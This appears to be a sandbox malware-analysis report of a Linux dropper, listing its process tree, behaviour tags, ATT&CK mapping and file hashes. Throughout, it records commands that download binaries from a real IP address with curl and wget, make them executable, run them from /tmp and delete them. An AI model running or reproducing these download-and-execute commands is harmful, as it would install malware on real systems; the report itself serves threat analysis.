/usr/bin/curlcurl -O http://87.120.125.191/bins/9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:854
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ2⤵
- System Network Configuration Discovery
PID:855
-
-
/bin/chmodchmod 777 9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ2⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ./9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:857
-
-
/bin/rmrm 9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ2⤵
- System Network Configuration Discovery
PID:858
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/PRidtlDXU05jmgjuUObnLgOEzRMj94T04O2⤵PID:859
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/PRidtlDXU05jmgjuUObnLgOEzRMj94T04O2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:860
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/PRidtlDXU05jmgjuUObnLgOEzRMj94T04O2⤵PID:861
-
-
/bin/chmodchmod 777 PRidtlDXU05jmgjuUObnLgOEzRMj94T04O2⤵
- File and Directory Permissions Modification
PID:862
-
-
/tmp/PRidtlDXU05jmgjuUObnLgOEzRMj94T04O./PRidtlDXU05jmgjuUObnLgOEzRMj94T04O2⤵
- Executes dropped EXE
PID:863
-
-
/bin/rmrm PRidtlDXU05jmgjuUObnLgOEzRMj94T04O2⤵PID:864
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE2⤵PID:865
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:866
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE2⤵PID:867
-
-
/bin/chmodchmod 777 pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE./pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE2⤵PID:870
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB2⤵PID:871
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB2⤵PID:873
-
-
/bin/chmodchmod 777 SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB./SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB2⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC2⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC2⤵PID:879
-
-
/bin/chmodchmod 777 pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC./pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC2⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F2⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F2⤵PID:885
-
-
/bin/chmodchmod 777 nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F./nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F2⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl2⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl2⤵PID:891
-
-
/bin/chmodchmod 777 slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl./slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl2⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak2⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak2⤵PID:897
-
-
/bin/chmodchmod 777 JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak./JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak2⤵PID:900
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s92⤵PID:901
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s92⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s92⤵PID:903
-
-
/bin/chmodchmod 777 QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s92⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s9./QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s92⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s92⤵PID:906
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT2⤵PID:907
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT2⤵PID:909
-
-
/bin/chmodchmod 777 aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT./aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT2⤵PID:912
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97